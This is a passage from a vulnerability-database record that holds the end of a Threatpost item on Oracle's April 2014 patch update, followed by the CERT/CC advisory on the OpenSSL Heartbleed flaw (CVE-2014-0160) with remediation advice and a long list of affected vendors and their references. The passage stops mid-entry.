The most severe of these vulnerabilities could affect certain versions of Oracle Global Secure Desktop.\n\n\u201cDue to the relative severity of a number of the vulnerabilities fixed in this Critical Patch Update, Oracle strongly recommends that customers apply this Critical Patch Update as soon as possible,\u201d wrote Oracle security assurance manager, Eric Maurice.\n\nEarlier this month, [researchers from Security Explorations disclosed more than two dozen outstanding issues with the company\u2019s Java Cloud Service platform](<http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs/105190>). There is no mention of that line of products in the update, so it appears that the company did not resolve those bugs. At the beginning of March, researchers at the London-based computer security firm Portcullis claimed to uncover [four bugs in Oracle\u2019s Demantra Value Chain Planning suite of software](<http://threatpost.com/four-vulnerabilities-found-in-oracle-demantra/104574>). The update makes no mention of these vulnerabilities either.\n", "modified": "2014-04-21T14:36:06", "published": "2014-04-16T12:32:06", "id": "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "href": "https://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494/", "type": "threatpost", "title": "April 2014 Oracle Critical Patch Update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2020-09-18T20:41:46", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "### Overview \n\nOpenSSL 1.0.1 and 1.0.2 beta contain a vulnerability that could disclose sensitive private information to an attacker. 
This vulnerability is commonly referred to as \"heartbleed.\"\n\n### Description \n\nOpenSSL versions 1.0.1 through 1.0.1f and 1.0.2 beta through 1.0.2-beta1 contain a flaw in its implementation of the TLS/DTLS heartbeat functionality ([RFC6520](<https://tools.ietf.org/html/rfc6520>)). This flaw allows an attacker to retrieve private memory of an application that uses the vulnerable OpenSSL libssl library in chunks of up to 64k at a time. Note that an attacker can repeatedly leverage the vulnerability to increase the chances that a leaked chunk contains the intended secrets. The sensitive information that may be retrieved using this vulnerability include:\n\n * Primary key material (secret keys)\n * Secondary key material (user names and passwords used by vulnerable services)\n * Protected content (sensitive data used by vulnerable services)\n * Collateral (memory addresses and content that can be leveraged to bypass exploit mitigations)\n \nPlease see the [Heartbleed](<http://heartbleed.com/>) website for more details. Exploit code for this vulnerability is publicly available. Any service that supports STARTTLS (imap,smtp,http,pop) may also be affected. \n--- \n \n### Impact \n\nBy attacking a service that uses a vulnerable version of OpenSSL, a remote, unauthenticated attacker may be able to retrieve sensitive information, such as secret keys. By leveraging this information, an attacker may be able to decrypt, spoof, or perform man-in-the-middle attacks on network traffic that would otherwise be protected by OpenSSL. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in [OpenSSL 1.0.1g](<http://www.openssl.org/news/secadv_20140407.txt>). Please contact your software vendor to check for availability of updates. Any system that may have exposed this vulnerability should regenerate any sensitive information (secret keys, passwords, etc.) with the assumption that an attacker has already used this vulnerability to obtain those items. 
Old keys should be revoked. \n \nReports indicate that the use of `mod_spdy` can prevent the updated OpenSSL library from being utilized, as mod_spdy uses its own copy of OpenSSL. Please see <https://code.google.com/p/mod-spdy/issues/detail?id=85> for more details. \n \n--- \n \n**Disable OpenSSL heartbeat support** \n \nThis issue can be addressed by recompiling OpenSSL with the `-DOPENSSL_NO_HEARTBEATS` flag. Software that uses OpenSSL, such as Apache or Nginx would need to be restarted for the changes to take effect. \n \n**Use Perfect Forward Secrecy (PFS)** \n \n[PFS](<http://en.wikipedia.org/wiki/Forward_secrecy>) can help minimize the damage in the case of a secret key leak by making it more difficult to decrypt already-captured network traffic. However, if a ticket key is leaked, then any sessions that use that ticket could be compromised. Ticket keys may only be regenerated when a web server is restarted. \n \n--- \n \n### Vendor Information\n\n720951\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Amazon Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://aws.amazon.com/security/security-bulletins/aws-services-updated-to-address-openssl-vulnerability/>\n\n### Arch Linux Affected\n\nUpdated: April 15, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugs.archlinux.org/task/39775>\n\n### Aruba Networks, Inc. 
Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.arubanetworks.com/support/alerts/aid-040814.asc>\n\n### Attachmate __ Affected\n\nUpdated: April 29, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Some Attachmate products with specific versions are affected by the \nCVE-2014-0160 OpenSSL 'Heartbleed' vulnerability when TLS protocol \nconnections are used. All affected products now have either new versions \nor hot fixes available. \n \nAttachmate maintains the following technical note about affected and \nnon-vulnerable versions: \n<http://support.attachmate.com/techdocs/2724.html> \n \nIn addition, Security Updates technical notes are also available for \nspecific \nproducts: \nSecurity Updates and Reflection for the Web or Reflection Security Gateway \n<http://support.attachmate.com/techdocs/1704.html> \nSecurity Updates and Reflection \n<http://support.attachmate.com/techdocs/1708.html> \nSecurity Updates and Reflection for Secure IT \n<http://support.attachmate.com/techdocs/2288.html> \nSecurity Updates and EXTRA! 
\n<http://support.attachmate.com/techdocs/2501.html> \nSecurity Updates and Reflection 2014 or Reflection 2011 \n<http://support.attachmate.com/techdocs/2502.html> \nSecurity Updates and INFOConnect \n<http://support.attachmate.com/techdocs/2546.html> \nSecurity Updates and Verastream \n<http://support.attachmate.com/techdocs/2700.html>`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.attachmate.com/techdocs/2724.html>\n * <http://support.attachmate.com/techdocs/1704.html>\n * <http://support.attachmate.com/techdocs/1708.html>\n * <http://support.attachmate.com/techdocs/2288.html>\n * <http://support.attachmate.com/techdocs/2501.html>\n * <http://support.attachmate.com/techdocs/2502.html>\n * <http://support.attachmate.com/techdocs/2546.html>\n * <http://support.attachmate.com/techdocs/2700.html>\n\n### Bee Ware __ Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\ni-Suite versions 5.4.0 and above, up to version 5.5.4, are vulnerable. 
Versions 5.2.8 and 5.3.x are not vulnerable.\n\n### Vendor References\n\n * <http://documentation.bee-ware.net/display/SECU/CVE-2014-0160+-+OpenSSL+Heartbleed+Bug>\n\n### Blue Coat Systems Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://kb.bluecoat.com/index?page=content&id=SA79](<http://kb.bluecoat.com/index?page=content&id=SA79>)\n\n### CA Technologies Affected\n\nNotified: April 08, 2014 Updated: April 25, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={967F13F1-5720-4592-9BEB-42AD69EA14DC}>\n * <https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={7EBD736F-0227-4AEB-A7A9-9C5A4EA449C3}>\n\n### Cisco Systems, Inc. 
Affected\n\nNotified: April 08, 2014 Updated: April 10, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed>\n\n### Debian GNU/Linux Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.debian.org/security/2014/dsa-2896>\n\n### Extreme Networks __ Affected\n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe following products and versions are affected by the VU#720951 OpenSSL vulnerability.\n\nExtremeXOS version 15.4.1.x - A patch update for ExtremeXOS 15.4.1.3-patch1-10 or higher is available for download \n \n64 bit (Ubuntu) NetSight Appliance version 4.4, 5.0, 5.1 and 6.0 - A patch update is currently available for 4.4, 5.0, 5.1 and 6.0 \n \n64 bit (Ubuntu) NAC Appliance version 5.0, 5.1 and 6.0 - A patch update is currently available for 5.0, 5.1 and 6.0. \n \n64 bit (Ubuntu) Purview Appliance version 6.0 - A patch update is currently available. \n \nNote: Please contact the Extreme Networks Global Technical Assistance Center (GTAC) for access to the patch in the event not found on the Extreme Networks support site. \n \nExtreme Networks has also published the below advisory on its website. Please refer the same for additional information. 
\n<http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://learn.extremenetworks.com/rs/extreme/images/CERT_VU%23720951_Vulnerability_Advisory_04_11_2014v2.pdf>\n\n### F5 Networks, Inc. Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217>\n\n### Fedora Project Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### Fortinet, Inc. 
__ Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe have determined that the following products are vulnerable:\n\nFortiGate (FortiOS) 5.0 and higher \nFortiAuthenticator 3.0 and higher \nFortiMail 5.0 and higher \nFortiVoice (all versions) \nFortiRecorder (all versions)\n\n### Vendor References\n\n * <http://www.fortiguard.com/advisory/FG-IR-14-011/>\n\n### FreeBSD Project __ Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nFreeBSD 10.0-RELEASE, 10.0-STABLE and 11.0-CURRENT have been patched\n\nfor this issue (CVE-2014-0160/VU #720951), both in source and binary \n(via freebsd-update) forms. Earlier FreeBSD releases are not affected \nby this issue.\n\n### Vendor References\n\n * <http://www.freebsd.org/security/advisories/FreeBSD-SA-14:06.openssl.asc>\n\n### Gentoo Linux Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.gentoo.org/security/en/glsa/glsa-201404-07.xml>\n\n### Global Technology Associates, Inc. 
__ Affected\n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n**Statement Date: April 23, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have determined that GTA firewalls running the following versions of GB-OS are vulnerable and should be upgraded to the indicated version.\n\nGB-OS version 6.1.0 to 6.1.5 are vulnerable and should upgrade to GB-OS 6.1.6 \nGB-OS version 6.0.0 to 6.0.7 are vulnerable and should upgrade to GB-OS 6.0.8 \n \nCustomers using GTA firewalls with an unsupported version of GB-OS should upgrade to a currently supported version.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Google __ Affected\n\nNotified: April 08, 2014 Updated: April 23, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://googleonlinesecurity.blogspot.com/2014/04/google-services-updated-to-address.html>\n * <https://groups.google.com/forum/?_escaped_fragment_=topic/mod-spdy-discuss/EwCowyS1KTU#!topic/mod-spdy-discuss/EwCowyS1KTU>\n\n### Addendum\n\nmod_spdy is affected, as are some versions of the Google Search Appliance. GSA 7.0.14.G.212 addresses this issue.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Hewlett-Packard Company Affected\n\nNotified: April 08, 2014 Updated: May 02, 2014 \n\n**Statement Date: April 14, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * 
<http://h17007.www1.hp.com/docs/advisories/HPNetworkingSecurityAdvisory-OpenSSL-HeartbleedVulnerability.pdf>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236102>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236062>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239372>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04240206>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04242672>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239374>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04250814>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04248997>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04255796>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260353>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260456>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04260505>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262472>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04262670>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04261644>\n * <https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375>\n\n### Hitachi __ Affected\n\nNotified: April 08, 2014 Updated: May 27, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Hitachi has published the below advisory on its website. Please refer \nthe advisory for additional information. 
This advisory includes \nHitachi products for Industrial Control Platform. \n \nHIRT-PUB14005: OpenSSL TLS heartbeat extension read overrun issue in \nHitachi products (VU#720951, CVE-2014-0160) \n<http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.hitachi.com/hirt/publications/hirt-pub14005/index.html>\n\n### IBM Corporation Affected\n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc>\n * [http://www-01.ibm.com/support/docview.wss?&uid=swg21669774](<http://www-01.ibm.com/support/docview.wss?&uid=swg21669774>)\n\n### Intel Corporation Affected\n\nNotified: April 08, 2014 Updated: April 15, 2014 \n\n**Statement Date: April 15, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr](<https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00037&languageid=en-fr>)\n\n### Juniper Networks, Inc. Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://kb.juniper.net/JSA10623>\n\n### Mandriva S. A. 
Affected\n\nNotified: April 08, 2014 Updated: April 07, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MarkLogic Corporation __ Affected\n\nUpdated: April 15, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n`Recently a serious security vulnerability was discovered in the OpenSSL \ncryptographic software \nlibrary. MarkLogic application servers can be configured to use SSL, and \nMarkLogic uses OpenSSL to \nprovide this capability. A patch to OpenSSL has been released to address \nthis vulnerability, and \nMarkLogic has built patches for all impacted MarkLogic versions with \nOpenSSL 1.0.1g to incorporate \nthis new fix. \n \n \n \nImpacted Versions \n \n \n \nThe following versions of MarkLogic are impacted by this vulnerability: \n \n\u00b7 MarkLogic 5.0-5 through 5.0-6 \n \n\u00b7 All versions of MarkLogic 6.0 (6.0-1 through 6.0-5) \n \n\u00b7 All versions of MarkLogic 7.0 (7.0-1 through 7.0-2.2), \nincluding the MarkLogic AMIs \n \n \n \nMarkLogic versions prior to 5.0-5 use an earlier version of OpenSSL that \ndoes not have this \nvulnerability. \n \n \n \nHow to Patch \n \n \n \nWe recommend that customers who are using SSL patch their systems \nimmediately. To do this: \n \n1. Upgrade your cluster to the patch release, available at \n<http://developer.marklogic.com/products>. \n \nPatch release versions are as follows: \n \no MarkLogic 5.0-6.1 \n \no MarkLogic 6.0-5.1 \n \no MarkLogic 7.0-2.3 \n \n2. Regenerate all SSL certificates for your cluster. This is \nnecessary because the \nvulnerability is such that private keys for your certificates are \npotentially compromised. 
See \n\u201cConfiguring SSL on App Servers\u201d in the documentation: \n \no MarkLogic 5 documentation: \n<http://docs.marklogic.com/5.0/guide/admin/SSL#chapter> \n \no MarkLogic 6 documentation: \n<http://docs.marklogic.com/6.0/guide/admin/SSL#chapter> \n \no MarkLogic 7 documentation: \n<http://docs.marklogic.com/guide/admin/SSL#chapter> \n \n3. If you are using BASIC or Application Level Authentication over \nSSL, have all your \nusers change their passwords after you've patched and deployed new SSL \ncertificates. This includes \nboth internal users in our security database, and anyone using external \nauthentication (which \nrequires BASIC authentication over SSL). This is necessary because the \nvulnerability may have \nresulted in password leaks. \n \n \n \nIf you have any questions about how to patch, feel free to contact \nsupport@marklogic.com. \n \n \n \nMore information about the heartbleed vulnerability can be found at \n<http://heartbleed.com> or \n<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>.`\n\n### McAfee Affected\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 11, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10071](<https://kc.mcafee.com/corporate/index?page=content&id=SB10071>)\n\n### NVIDIA __ Affected\n\nUpdated: May 05, 2014 \n\n**Statement Date: May 05, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n<http://nvidia.custhelp.com/app/answers/detail/a_id/3492>\n\n### NetBSD __ Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### Vendor Information \n\nNetBSD is vulnerable (in the version 6 train, not in the version 5 train) pkgsrc is vulnerable (1.0.1 versions of OpenSSL packages below 1.0.1g, no surprises there)\n\n### Vendor References\n\n * <http://mail-index.netbsd.org/security-announce/2014/04/08/msg000085.html>\n\n### OpenBSD Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.5/common/002_openssl.patch.sig>\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.4/common/007_openssl.patch>\n * <http://ftp.openbsd.org/pub/OpenBSD/patches/5.3/common/014_openssl.patch>\n\n### OpenSSL Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.openssl.org/news/secadv_20140407.txt>\n\n### OpenVPN Technologies Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://community.openvpn.net/openvpn/wiki/heartbleed>\n\n### Oracle Corporation Affected\n\nNotified: April 08, 2014 Updated: April 16, 2014 \n\n**Statement Date: April 16, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * 
<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>\n\n### Red Hat, Inc. Affected\n\nNotified: April 08, 2014 Updated: April 08, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/CVE-2014-0160>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-0160>\n * <https://rhn.redhat.com/errata/RHSA-2014-0376.html>\n\n### Slackware Linux Inc. Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.533622>)\n\n### Sophos, Inc. 
Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://blogs.sophos.com/2014/04/09/sophos-utm-manager-and-openssl-vulnerability/>\n\n### Symantec __ Affected\n\nNotified: April 08, 2014 Updated: May 13, 2016 \n\n**Statement Date: April 18, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.symantec.com/outbreak/?id=heartbleed>\n * <http://www.symantec.com/content/en/us/enterprise/other_resources/b-symantec-product-list-heartbleed.pdf>\n * [https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00](<https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00>)\n\n### Addendum\n\nCERT/CC has confirmed with Symantec that Symantec Messaging Gateway version 10.6.1 is vulnerable. 
Please see the most recent Symantec advisory (`SYM16-007`) above.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Ubuntu __ Affected\n\nNotified: April 08, 2014 Updated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2165-1/>\n * <https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1304042>\n\n### Addendum\n\nNote that the version number reported by openssl does not reflect the patch level. To verify that the usn-2165-1 fixed versions are installed, run the following command \n`dpkg -l openssl libssl* | cat` \nand compare the reported version numbers with those listed in the advisory.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23720951 Feedback>).\n\n### Unisys __ Affected\n\nNotified: April 08, 2014 Updated: April 17, 2014 \n\n**Statement Date: April 17, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\n**Heartbleed bug \u2013 Public and Client Communication**\n\nDear Unisys client,\n\nUnisys prides itself on ensuring the mission-critical operations of our clients \u2013 and the security of your systems is a priority for us. I am writing to let you know how we are addressing any risks related to the Heartbleed bug that has been reported in the news and to provide you with information that may help you address your own risks.\n\nHeartbleed is a software bug in the OpenSSL technology used to create a secure link over the Internet between a server and a computer asset such as a laptop or PC. 
The bug, which has existed for about two years but was only publicly disclosed last week, is believed to have affected a significant number of websites globally. \n\nUnisys has undertaken a comprehensive review of our servers, products, and client-owned servers under our management for risks associated with the Heartbleed bug. Here\u2019s what you need to know:\n\n-We have not found any vulnerability in our public-facing Web servers. We continue to monitor the product advisories of our major vendors for any potential issues. \n\n\n-The vast majority of our released products, including MCP, OS 2200, Forward!, Stealth, and Choreographer, are not vulnerable to the Heartbleed bug. Two instances of potential vulnerabilities were found in add-on products; in those cases, we have done remediation efforts and notified clients. \n\n\n-The vast majority of client-owned servers under our management are not affected by the Heartbleed bug. For servers that may have been affected, we have notified the client and after consulting with the client, we are in the process of patching those servers, changing the server side certificates and instructing users to change their passwords. \n\n\n-Currently, only version 1.0.1 - 1.0.1f of the open-source SSL is affected. We have upgraded any client-owned servers under our management to version 1.0.1g. We recommend that you check the other servers that you manage. \n\n\n-Our Security Services team can help you in this process and can also perform a penetration test to determine if you are vulnerable and help you contain any resulting damage.\n\nWe stand ready to assist you. 
Please contact your Unisys representative or service delivery manager to discuss your requirements or to order a penetration test.\n\nWe appreciate your business.\n\nUnisys\n\n### VMware __ Affected\n\nNotified: April 08, 2014 Updated: April 22, 2014 \n\n**Statement Date: April 09, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nVMware has released product updates and patches for all affected products\n\nlisted in VMware Knowledge Base article 2076225.\n\n### Vendor Information \n\nVMware Security Advisory VMSA-2014-0004 lists the updated products and \npatch releases that address CVE-2014-0160 in VMware products and provides \nreferences to specific product documentation.\n\n### Vendor References\n\n * <http://www.vmware.com/security/advisories/VMSA-2014-0004.html>\n * <http://kb.vmware.com/kb/2076225>\n\n### Watchguard Technologies, Inc. Affected\n\nUpdated: April 09, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://watchguardsecuritycenter.com/2014/04/08/the-heartbleed-openssl-vulnerability-patch-openssl-asap/>\n\n### Wind River Systems, Inc. __ Affected\n\nNotified: April 08, 2014 Updated: April 11, 2014 \n\n**Statement Date: April 08, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWind River has investigated its products regarding the Heartbleed vulnerability. The conclusion is:\n\nVxWorks is not vulnerable. \nWR Linux 3.x and 4.x are not vulnerable. \nWR Linux 5.0.1.x is vulnerable if the optional openssl-1.0.1 package is installed. \nWR Linux 6.0.0.x is vulnerable. \nINP 3.4 is vulnerable. \n \nWind River customers can find additional information, e.g. 
